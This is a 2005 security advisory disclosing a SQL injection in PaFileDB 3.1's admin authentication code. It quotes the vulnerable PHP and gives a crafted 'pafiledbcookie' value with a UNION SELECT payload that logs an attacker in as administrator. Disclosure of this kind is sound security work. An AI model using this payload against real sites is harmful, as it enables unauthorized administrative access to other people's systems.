PaFileDB31SQL.txt

`[SePro Advisory #5] PaFileDB 3.1 - SQL-Injection  
===========================================================  
  
Vendor: PhpArena  
URL: http://www.phparena.net/  
Date: 17.08.05  
  
App.: PaFileDB  
Version: 3.1  
Type: SQL-Injection  
Risc: High  
  
  
  
Credits:  
================================  
Newangels & security-project.org Team  
Vulnerability discovered by deluxe89  
Writeup by Astovidatu  
  
  
Description:  
================================  
paFileDB is designed to allow webmasters have a database of files for download on their site.   
  
See [1] for a detailed description.  
  
  
  
SQL-Injection:  
================================  
The vulnerable file: '/includes/admin/auth.php'  
  
Pre-conditions:  
- magic_quotes_gpc Off  
- $authmethod = cookies  
  
  
Vulnerable Code:  
[code]  
if ($authmethod == "cookies") {  
echo "authmethod = cookies\n";  
$cdata = explode("|", $pafiledbcookie);  
$ip = $cdata[0];  
$user = $cdata[1];  
$pass = $cdata[2];  
echo "ip = $ip, user = $user, pass = $pass\n";  
}  
if (!empty($user)) {  
echo "user not emtpy\n";  
$admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin WHERE admin_username = '$user'", 1);  
$adminip = getenv ("REMOTE_ADDR");  
$md5ip = md5($adminip);  
if ($pass == $admin[admin_password] && $md5ip == $ip) {  
$logged = 1;  
}  
} else {  
echo "user empty\n";  
$logged = 0;  
}  
[/code]  
  
  
SQL-Injection through $user.  
  
In order to exploit the issue, an attacker needs to construct a malformed cookie:  
Name: pafiledbcookie  
Content: [MD5 IP]%7CaG'+union+select+1,2,'pass',4,5/*%7Cpass  
  
"/pafiledb.php?action=admin": open and your logged in as admin in the ACP.  
  
  
  
Solution:  
================================  
There is no solution yet.  
  
  
  
  
[1] http://www.phparena.net/scripts.php?script=pafiledb  
`